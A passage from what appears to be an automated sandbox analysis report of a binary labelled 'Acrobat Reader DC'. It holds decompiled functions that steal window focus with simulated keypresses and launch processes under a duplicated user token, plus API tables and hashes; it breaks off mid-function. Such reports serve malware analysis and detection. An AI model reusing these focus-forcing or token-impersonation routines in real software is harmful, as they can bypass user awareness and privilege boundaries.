				_t3 = E00414904(_t4, _t5, _t6, _t7, _t10); // executed
				return _t3;
			}










                                  0x004149c7
                                  0x004149c9
                                  0x004149cc
                                  0x004149cf
                                  0x004149d8

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wfsopen
                                  • String ID:
                                  • API String ID: 197181222-0
                                  • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                  • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                  • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                  • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00434418(struct HWND__* _a4) {
				long _v8;
				int _v12;
				struct HWND__* _t13;
				DWORD* _t15;
				long _t20;
				int _t24;
				long _t39;
				struct HWND__* _t45;
				long _t46;
				struct HWND__* _t47;

				_t13 = GetForegroundWindow();
				_t45 = _a4;
				_t47 = _t13;
				if(_t45 != _t47) {
					if(_t47 == 0) {
						_t47 = FindWindowW(L"Shell_TrayWnd", _t47);
					}
					if(IsIconic(_t45) != 0) {
						ShowWindow(_t45, 9);
					}
					_v12 = 0;
					_t15 = SetForegroundWindow(_t45);
					if(_t15 != 0) {
						return 2;
					} else {
						_t46 = GetWindowThreadProcessId(_t47, _t15);
						_t39 = GetCurrentThreadId();
						_t20 = GetWindowThreadProcessId(_a4, 0);
						_v8 = _t20;
						AttachThreadInput(_t39, _t20, 1);
						AttachThreadInput(_t39, _t46, 1);
						AttachThreadInput(_t46, _v8, 1);
						_t24 = SetForegroundWindow(_a4);
						if(_t24 != 0) {
							_v12 = 3;
						} else {
							keybd_event(0x12, MapVirtualKeyW(0x12, _t24), _t24, _t24);
							keybd_event(0x12, MapVirtualKeyW(0x12, 0), 2, 0);
							keybd_event(0x12, MapVirtualKeyW(0x12, 0), 0, 0);
							keybd_event(0x12, MapVirtualKeyW(0x12, 0), 2, 0);
							if(SetForegroundWindow(_a4) != 0) {
								_v12 = 4;
							}
						}
						AttachThreadInput(_t39, _v8, 0);
						AttachThreadInput(_t39, _t46, 0);
						AttachThreadInput(_t46, _v8, 0);
						return _v12;
					}
				} else {
					return 1;
				}
			}













                                  0x00434420
                                  0x00434426
                                  0x00434429
                                  0x0043442d
                                  0x0043443e
                                  0x0043444c
                                  0x0043444c
                                  0x00434457
                                  0x0043445c
                                  0x0043445c
                                  0x00434463
                                  0x0043446a
                                  0x00434472
                                  0x00434566
                                  0x00434478
                                  0x00434483
                                  0x0043448b
                                  0x00434493
                                  0x0043449f
                                  0x004344a2
                                  0x004344a8
                                  0x004344b1
                                  0x004344b7
                                  0x004344bf
                                  0x00434531
                                  0x004344c1
                                  0x004344cf
                                  0x004344e6
                                  0x004344fd
                                  0x00434514
                                  0x00434526
                                  0x00434528
                                  0x00434528
                                  0x00434526
                                  0x0043453f
                                  0x00434545
                                  0x0043454e
                                  0x00434559
                                  0x00434559
                                  0x00434430
                                  0x00434439
                                  0x00434439

                                  APIs
                                  • GetForegroundWindow.USER32 ref: 00434420
                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                  • IsIconic.USER32(?), ref: 0043444F
                                  • ShowWindow.USER32(?,00000009), ref: 0043445C
                                  • SetForegroundWindow.USER32(?), ref: 0043446A
                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                  • GetCurrentThreadId.KERNEL32 ref: 00434485
                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                  • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                  • keybd_event.USER32 ref: 004344CF
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                  • keybd_event.USER32 ref: 004344E6
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                  • keybd_event.USER32 ref: 004344FD
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                  • keybd_event.USER32 ref: 00434514
                                  • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                  • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                  • String ID: Shell_TrayWnd
                                  • API String ID: 2889586943-2988720461
                                  • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                  • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                  • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                  • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00446313 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 234processCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 74%
                                  			E00446313(intOrPtr _a4, char _a7, intOrPtr _a8, void* _a12, signed int _a16, intOrPtr _a20, signed int _a24, WCHAR* _a28, struct _STARTUPINFOW* _a32, struct _PROCESS_INFORMATION* _a36) {
				char _v9;
				void* _v16;
				char _v20;
				void* _v24;
				void* _v28;
				struct HWINSTA__* _v32;
				intOrPtr _v40;
				WCHAR* _v44;
				intOrPtr _v52;
				char _v56;
				char _v60;
				intOrPtr _v80;
				char _v88;
				void* __edi;
				void* __esi;
				char _t88;
				struct HDESK__* _t90;
				struct HWINSTA__* _t91;
				void* _t95;
				struct HDESK__* _t103;
				void* _t105;
				void* _t106;
				struct _STARTUPINFOW* _t109;
				intOrPtr _t110;
				void* _t118;
				WCHAR* _t127;
				int _t156;
				struct HWINSTA__* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t175;

				_t154 = _a4;
				_t158 = 0;
				_v9 = 0;
				_v16 = 0;
				_v24 = 0;
				_v20 = 0;
				_v32 = 0;
				_t127 = 0;
				_v28 = 0;
				E00412F40( &_v88, 0, 0x20);
				_t85 = _a16;
				_t160 = _t159 + 0xc;
				_v88 = 0x20;
				_v80 = _a4;
				_a7 = 0;
				if((_a16 & 0x00000001) != 0) {
					_a7 = 1;
				}
				if(E00436CD7(_t154, _a8, _a12, _t85,  &_v16) == 0) {
					L24:
					_t88 = _v60;
					__eflags = _t88;
					if(_t88 != 0) {
						__imp__UnloadUserProfile(_v16, _t88);
					}
					goto L26;
				} else {
					if((_a16 & 0x00000002) == 0) {
						L6:
						_t158 = OpenWindowStationW(L"winsta0", 0, 0x60000);
						if(_t158 == 0 || _t158 == 0xffffffff) {
							goto L24;
						} else {
							_v32 = GetProcessWindowStation();
							if(SetProcessWindowStation(_t158) == 0) {
								goto L24;
							}
							_t103 = OpenDesktopW(L"default", 0, 0, 0x60081);
							_v24 = _t103;
							if(_t103 == 0) {
								goto L24;
							}
							_t171 = _t103 - 0xffffffff;
							if(_t103 == 0xffffffff) {
								goto L24;
							}
							_t105 = E00436D09(_t158, _t171, _v16,  &_v20);
							_t172 = _t105;
							if(_t105 == 0) {
								goto L24;
							}
							_v56 = 0xb00;
							_v52 = 0xf0000000;
							_v44 = 0x400;
							_v40 = 0xf037f;
							_t106 = E00446124(_t172, _t158, _v20,  &_v56);
							_t173 = _t106;
							if(_t106 == 0) {
								goto L24;
							}
							_v44 = _t127;
							_v40 = 0xf01ff;
							if(E00445F35(_t173, _v24, _v20,  &_v44) == 0) {
								goto L24;
							}
							_t109 = _a32;
							_t109->lpDesktop = L"winsta0\\default";
							_t110 = _a20;
							_t156 =  *(_t109 + 0x2c) & 0x00000100;
							_a12 = _t156;
							_t175 = _t110;
							if(_t175 != 0) {
								_t47 = E004111C1(_t110) + 1; // 0x1
								_push( ~(_t175 > 0) | _t47 * 0x00000002);
								_t127 = E004115D7(_t47, _t158,  ~(_t175 > 0) | _t47 * 0x00000002);
								_t110 = E00412FBA(_t127, _a20, _t47);
								_t156 = _a12;
								_t160 = _t160 + 0x14;
							}
							if(_a7 == 0) {
								L18:
								if((_a16 & 0x00000004) != 0) {
									L20:
									if(CreateProcessAsUserW(_v16, 0, _t127, 0, 0, _t156, _a24 | 0x00000400, _v28, _a28, _a32, _a36) == 0) {
										goto L24;
									}
									if(_a7 != 0) {
										E00436C6E(_a36,  &_v60,  &_v16);
									}
									_v9 = 1;
									L26:
									E00436BA9(_v20);
									if(_t158 != 0) {
										CloseWindowStation(_t158);
									}
									_t90 = _v24;
									if(_t90 != 0) {
										CloseDesktop(_t90);
									}
									_t91 = _v32;
									if(_t91 != 0) {
										SetProcessWindowStation(_t91);
									}
									CloseHandle(_v16);
									_push(_t127);
									E004111DC();
									_t95 = _v28;
									if(_t95 != 0) {
										__imp__DestroyEnvironmentBlock(_t95);
									}
									return _v9;
								}
								_t118 = _v16;
								__imp__CreateEnvironmentBlock( &_v28, _t118, 0);
								if(_t118 == 0) {
									goto L24;
								}
								goto L20;
							} else {
								__imp__LoadUserProfileW(_v16,  &_v88);
								if(_t110 == 0) {
									goto L24;
								}
								goto L18;
							}
						}
					}
					if(DuplicateTokenEx(_v16, 0, 0, 2, 1,  &_a12) == 0) {
						goto L24;
					}
					CloseHandle(_v16);
					_v16 = _a12;
					goto L6;
				}
			}


































                                  0x0044631c
                                  0x0044631f
                                  0x00446328
                                  0x0044632c
                                  0x0044632f
                                  0x00446332
                                  0x00446335
                                  0x00446338
                                  0x0044633a
                                  0x0044633d
                                  0x00446342
                                  0x00446345
                                  0x00446348
                                  0x0044634f
                                  0x00446352
                                  0x00446357
                                  0x00446359
                                  0x00446359
                                  0x00446372
                                  0x00446549
                                  0x00446549
                                  0x0044654c
                                  0x0044654e
                                  0x00446555
                                  0x00446555
                                  0x00000000
                                  0x00446378
                                  0x0044637c
                                  0x004463ac
                                  0x004463be
                                  0x004463c2
                                  0x00000000
                                  0x004463d1
                                  0x004463d8
                                  0x004463e3
                                  0x00000000
                                  0x00000000
                                  0x004463f7
                                  0x004463fd
                                  0x00446402
                                  0x00000000
                                  0x00000000
                                  0x00446408
                                  0x0044640b
                                  0x00000000
                                  0x00000000
                                  0x00446419
                                  0x0044641e
                                  0x00446420
                                  0x00000000
                                  0x00000000
                                  0x0044642f
                                  0x00446435
                                  0x0044643c
                                  0x00446442
                                  0x00446449
                                  0x0044644e
                                  0x00446450
                                  0x00000000
                                  0x00000000
                                  0x00446462
                                  0x00446466
                                  0x00446474
                                  0x00000000
                                  0x00000000
                                  0x0044647a
                                  0x00446480
                                  0x00446487
                                  0x0044648a
                                  0x00446490
                                  0x00446493
                                  0x00446495
                                  0x0044649d
                                  0x004464b2
                                  0x004464b8
                                  0x004464c0
                                  0x004464c5
                                  0x004464c8
                                  0x004464c8
                                  0x004464cf
                                  0x004464e3
                                  0x004464e7
                                  0x004464fd
                                  0x0044652a
                                  0x00000000
                                  0x00000000
                                  0x00446530
                                  0x0044653e
                                  0x0044653e
                                  0x00446543
                                  0x0044655b
                                  0x0044655f
                                  0x00446569
                                  0x0044656c
                                  0x0044656c
                                  0x00446572
                                  0x00446577
                                  0x0044657a
                                  0x0044657a
                                  0x00446580
                                  0x00446585
                                  0x00446588
                                  0x00446588
                                  0x00446592
                                  0x00446598
                                  0x00446599
                                  0x0044659e
                                  0x004465a6
                                  0x004465a9
                                  0x004465a9
                                  0x004465b8
                                  0x004465b8
                                  0x004464e9
                                  0x004464f3
                                  0x004464fb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004464d1
                                  0x004464d9
                                  0x004464e1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004464e1
                                  0x004464cf
                                  0x004463c2
                                  0x00446396
                                  0x00000000
                                  0x00000000
                                  0x004463a0
                                  0x004463a9
                                  0x00000000
                                  0x004463a9

                                  APIs
                                  • _memset.LIBCMT ref: 0044633D
                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                  • CloseHandle.KERNEL32(?), ref: 004463A0
                                  • OpenWindowStationW.USER32 ref: 004463B8
                                  • GetProcessWindowStation.USER32 ref: 004463D1
                                  • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                  • _wcslen.LIBCMT ref: 00446498
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • _wcsncpy.LIBCMT ref: 004464C0
                                  • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                  • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                  • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                  • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                  • CloseWindowStation.USER32(00000000), ref: 0044656C
                                  • CloseDesktop.USER32(?), ref: 0044657A
                                  • SetProcessWindowStation.USER32(?), ref: 00446588
                                  • CloseHandle.KERNEL32(?), ref: 00446592
                                  • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                  • String ID: $@OH$default$winsta0
                                  • API String ID: 2173856841-3791954436
                                  • Opcode ID: 5824ace93f6d80d94595fe83079761c9375f447ecbc8cf85fbb585e8fea6ba76
                                  • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                  • Opcode Fuzzy Hash: 5824ace93f6d80d94595fe83079761c9375f447ecbc8cf85fbb585e8fea6ba76
                                  • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 55%
                                  			E004096A0(signed int* __eax, void* __eflags, void* __fp0, void* _a4, intOrPtr _a8, void* _a12, char* _a16) {
				intOrPtr _v8;
				short _v10;
				short _v12;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				void _v32;
				intOrPtr _v36;
				char _v40;
				char _v52;
				void* _v56;
				signed int _v60;
				intOrPtr _v64;
				void _v68;
				char _v76;
				void* _v80;
				char _v84;
				void* _v88;
				void _v92;
				char _v100;
				void _v104;
				signed int _v108;
				void* _v112;
				void* _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				char _v132;
				void _v136;
				void _v140;
				signed int _v144;
				void* _v148;
				signed int _v152;
				void* _v156;
				signed int _v160;
				char _v161;
				intOrPtr _v164;
				signed int _v168;
				signed int _v172;
				long _v176;
				WCHAR* _v180;
				signed int _v184;
				void _v188;
				void _v192;
				void* _v196;
				void* _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v224;
				intOrPtr _v228;
				void** __ebx;
				void* __edi;
				void* __esi;
				long _t937;
				void* _t938;
				signed int _t939;
				signed int* _t943;
				signed int _t946;
				signed int _t949;
				void* _t956;
				void* _t958;
				void* _t967;
				signed int _t968;
				signed int _t969;
				signed int _t974;
				signed int _t978;
				void* _t979;
				void* _t983;
				intOrPtr _t984;
				intOrPtr _t985;
				intOrPtr _t997;
				intOrPtr _t1000;
				void* _t1002;
				intOrPtr _t1003;
				void* _t1009;
				intOrPtr _t1011;
				void* _t1012;
				intOrPtr _t1013;
				void* _t1015;
				intOrPtr _t1016;
				void* _t1109;
				intOrPtr _t1111;
				void* _t1112;
				signed int _t1113;
				signed int _t1114;
				void _t1116;
				void* _t1123;
				void* _t1126;
				signed int _t1128;
				void* _t1129;
				signed int _t1130;
				void* _t1131;
				void* _t1139;
				void* _t1153;
				intOrPtr _t1158;
				void* _t1159;
				void* _t1160;
				signed int _t1162;
				void* _t1163;
				signed int _t1164;
				signed int _t1165;
				void* _t1166;
				void* _t1173;
				void* _t1176;
				signed int _t1177;
				signed int _t1193;
				signed int _t1194;
				short _t1195;
				void* _t1197;
				signed int _t1200;
				void* _t1202;
				signed int _t1204;
				void* _t1207;
				void* _t1215;
				void* _t1219;
				signed int _t1220;
				void* _t1222;
				void** _t1223;
				void* _t1227;
				intOrPtr* _t1228;
				signed int _t1229;
				void* _t1231;
				void* _t1232;
				signed int _t1235;
				signed int _t1236;
				void* _t1237;
				void* _t1239;
				void* _t1240;
				intOrPtr* _t1241;
				signed int _t1242;
				void* _t1243;
				void* _t1245;
				void* _t1246;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int* _t1252;
				void* _t1254;
				void* _t1256;
				void* _t1259;
				short* _t1265;
				void* _t1266;
				void _t1269;
				void* _t1270;
				void* _t1272;
				void* _t1276;
				void* _t1278;
				void* _t1281;
				void* _t1283;
				void* _t1284;
				void* _t1286;
				void* _t1288;
				signed int _t1290;
				signed int _t1291;
				signed int _t1295;
				signed int _t1296;
				void* _t1297;
				void* _t1298;
				intOrPtr* _t1308;
				signed int _t1310;
				signed int _t1311;
				void* _t1317;
				intOrPtr* _t1319;
				void* _t1322;
				void* _t1325;
				intOrPtr _t1330;
				signed int _t1332;
				intOrPtr _t1335;
				signed int _t1337;
				void* _t1341;
				void* _t1347;
				void _t1349;
				void* _t1350;
				signed int _t1351;
				signed int _t1352;
				long _t1354;
				void* _t1358;
				void* _t1359;
				void* _t1361;
				signed int _t1362;
				void _t1364;
				signed int _t1365;
				void* _t1369;
				void* _t1376;
				void* _t1379;
				intOrPtr* _t1382;
				void _t1385;
				intOrPtr _t1391;
				void* _t1393;
				intOrPtr _t1394;
				void* _t1396;
				void* _t1397;
				void* _t1402;
				void* _t1403;
				void** _t1406;
				signed int _t1407;
				void _t1411;
				signed int _t1412;
				long _t1413;
				void* _t1414;
				short _t1442;
				void* _t1443;
				void* _t1444;
				signed int _t1448;
				intOrPtr _t1450;
				intOrPtr _t1454;
				intOrPtr _t1455;
				void* _t1474;
				void* _t1477;
				void* _t1478;
				void* _t1485;
				void* _t1487;
				void** _t1488;
				signed int _t1493;
				signed int _t1507;
				void _t1508;
				void* _t1510;
				void* _t1511;
				void _t1513;
				void _t1519;
				void* _t1534;
				void* _t1537;
				void _t1545;
				signed int _t1549;
				intOrPtr _t1559;
				intOrPtr _t1561;
				intOrPtr _t1562;
				signed int _t1570;
				void* _t1593;
				WCHAR* _t1595;
				void _t1609;
				signed int _t1611;
				intOrPtr _t1617;
				intOrPtr _t1618;
				void* _t1652;
				signed int _t1660;
				signed int _t1664;
				intOrPtr _t1665;
				intOrPtr _t1668;
				void* _t1669;
				void* _t1672;
				void* _t1684;
				void* _t1693;
				intOrPtr _t1697;
				intOrPtr _t1710;
				intOrPtr _t1717;
				intOrPtr _t1725;
				void* _t1730;
				intOrPtr* _t1731;
				intOrPtr* _t1732;
				intOrPtr* _t1733;
				intOrPtr* _t1734;
				signed int _t1735;
				void _t1738;
				void* _t1740;
				void _t1741;
				signed int _t1746;
				signed int* _t1748;
				void* _t1750;
				signed int _t1753;
				signed int _t1754;
				long _t1755;
				signed int _t1761;
				intOrPtr _t1762;
				void* _t1763;
				void* _t1767;
				signed int _t1768;
				intOrPtr* _t1769;
				void* _t1770;
				void* _t1777;
				signed int _t1778;
				signed int _t1782;
				signed int _t1785;
				void* _t1787;
				void* _t1788;
				signed int _t1790;
				signed int _t1791;
				intOrPtr _t1796;
				signed int _t1799;
				signed int _t1803;
				void* _t1806;
				void* _t1809;
				void* _t1826;
				signed int _t1836;
				void* _t1851;

				_t1851 = __fp0;
				_t1391 = _a8;
				_t1728 = __eax;
				_t1757 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) +  *__eax * 4))))));
				_t937 = E004111C1( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) +  *__eax * 4)))))));
				_t1806 = (_t1803 & 0xfffffff8) - 0xd4 + 4;
				_v176 = _t937;
				_t938 = _t937 + 1;
				if(_t938 == 0) {
					_t939 = 8;
				} else {
					_t939 = (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3) + (_t938 + 7 >> 3);
					_t1836 = _t939;
				}
				_v172 = _t939;
				_push( ~(0 | _t1836 > 0x00000000) | _t939 * 0x00000002);
				_v180 = E004115D7(_t1728, _t1757, _t1836);
				E00410E60(_t941, _t1757, _v176 + _v176 + 2);
				_push(4);
				_t943 = E004115D7(_t1728, _t1757, _t1836);
				_t1809 = _t1806 + 0x14;
				if(_t943 == 0) {
					_t943 = 0;
				} else {
					 *_t943 = 1;
				}
				_v168 = _t943;
				if( *((intOrPtr*)(_a4 + 0x140)) == 0) {
					L288:
					E00402250( &_v180);
					goto L289;
				} else {
					if( *_t943 > 1) {
						 *_v168 =  *_v168 - 1;
						E004013A0( &_v180);
						_t949 = E00446618(_v176 + 1);
						_v176 = _t949;
						_push( ~(0 | __eflags > 0x00000000) | _t949 * 0x00000002);
						_t1761 = E004115D7(_t1728, _t949, __eflags);
						E00410E60(_t1761, _v184, _v180 +  &(_v180[1]));
						_t1809 = _t1809 + 0x10;
						_v184 = _t1761;
					}
					CharUpperBuffW(_v180, _v176);
					_t956 = _a4;
					_t1762 =  *((intOrPtr*)(_t956 + 0x13c));
					if(_t1762 != 0) {
						_t958 =  *((intOrPtr*)(_t956 + 0x140)) - 1;
						__eflags = _t958;
						if(_t958 < 0) {
							goto L288;
						}
						_v136 = 0;
						_v116 = _t958;
						do {
							asm("cdq");
							_v200 = _v116 + _v136 - _v136 >> 1;
							__eflags = E0040BCC0( &_v180,  *((intOrPtr*)(_t1762 + (_v116 + _v136 - _v136 >> 1) * 4)));
							if(__eflags >= 0) {
								if(__eflags <= 0) {
									__eflags = _v136 - _v116;
									if(_v136 > _v116) {
										goto L288;
									}
									_t1763 =  *(_t1762 + _v200 * 4);
									E00402250( &_v180);
									L17:
									_t967 = _t1763;
									if(_t967 == 0) {
										L289:
										_t946 = E0047DCBB(__eflags, _t1851, _a4, _t1391, _t1728, _a12);
										L264:
										return _t946;
									}
									_v136 =  *((intOrPtr*)(_t967 + 0x14));
									_t968 =  *_t1728;
									_v160 =  *((intOrPtr*)(_t967 + 0x18));
									_v24 =  *((intOrPtr*)(_t967 + 0x10));
									_t1609 =  *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) + _t968 * 4)) + 0xa));
									_t969 = _t968 + 1;
									 *_t1728 = _t969;
									_v8 =  *((intOrPtr*)(_a4 + 0x148));
									_v196 = 0;
									_v188 = 1;
									_v184 = 0;
									_v180 = 0x488088;
									_v176 = 0;
									_v172 = 0;
									_v168 = 0;
									_v132 = 0x48b874;
									_v128 = 0;
									_v124 = 0;
									_v120 = 0;
									if( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) + _t969 * 4)) + 8)) != 0x47) {
										_push(_t1609);
										_push(0x6f);
										_push(_a4);
										L624:
										E0045E737(_t1851);
										goto L625;
									} else {
										_t974 = _t969 + 1;
										_v104 = _t1609;
										_t1611 = _t974;
										_v204 = 0;
										_t1767 = 0;
										_v144 = _t1611;
										while(1) {
											 *_t1728 = _t974;
											_t1442 =  *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) + _t974 * 4)) + 8));
											if(_t1442 < 0x47) {
											}
											L21:
											_t974 = _t974 + 1;
											while(1) {
												 *_t1728 = _t974;
												_t1442 =  *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) + _t974 * 4)) + 8));
												if(_t1442 < 0x47) {
												}
												goto L22;
											}
											goto L21;
											L22:
											_t1443 = _t1442 - 0x47;
											__eflags = _t1443;
											if(_t1443 == 0) {
												_t1767 = _t1767 + 1;
												goto L21;
											}
											_t1444 = _t1443 - 1;
											__eflags = _t1444;
											if(_t1444 != 0) {
												__eflags = _t1444 != 0x37;
												if(_t1444 != 0x37) {
													goto L21;
												}
												_push( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1391 + 4)) + _t974 * 4 - 4)) + 0xa)));
												_push(0x6f);
												_push(_a4);
												goto L624;
											}
											__eflags = _t1767;
											if(_t1767 != 0) {
												_t1767 = _t1767 - 1;
												_t974 = _t974 + 1;
												continue;
											}
											_v208 = _t974;
											 *_t1728 = _t974 + 1;
											_t978 = _v24;
											__eflags = _t978 -  *0x4a90f8; // 0x0
											if(__eflags > 0) {
												L296:
												_v148 = _t1444;
												L28:
												_v116 = _t1444;
												__eflags = _v136 - _t1444;
												if(_v136 <= _t1444) {
													L57:
													_t979 = _v116;
													__eflags = _t979 - _v160;
													if(_t979 < _v160) {
														L622:
														_push(_v104);
														_push(0x70);
														goto L623;
													}
													__eflags = _t979 - _v136;
													if(_t979 > _v136) {
														goto L622;
													}
													__eflags = _t1611 - _v208;
													if(_t1611 != _v208) {
														goto L622;
													}
													_t1393 = _v24;
													_t1768 = 0;
													_v212 = 3;
													_v200 = 0;
													_v156 = 0;
													_v152 = _t1393;
													__eflags = _t1393;
													if(_t1393 < 0) {
														_v152 = 0;
													}
													__eflags =  *0x4a7f3d; // 0x0
													if(__eflags != 0) {
														_t1611 =  *0x4a7f38; // 0x0
														 *_t1611 = 0;
														_t1448 =  *0x4a7f38; // 0x0
														 *((intOrPtr*)(_t1448 + 4)) = _v152;
														 *0x4a7f3d = 0;
													} else {
														_push(0xc);
														_t1295 = E004115D7(_t1728, _t1768, __eflags);
														_t1809 = _t1809 + 4;
														__eflags = _t1295 - _t1768;
														if(_t1295 == _t1768) {
															_t1754 = 0;
														} else {
															_t1754 = _t1295;
															 *_t1754 = _t1768;
															_t1611 = _v152;
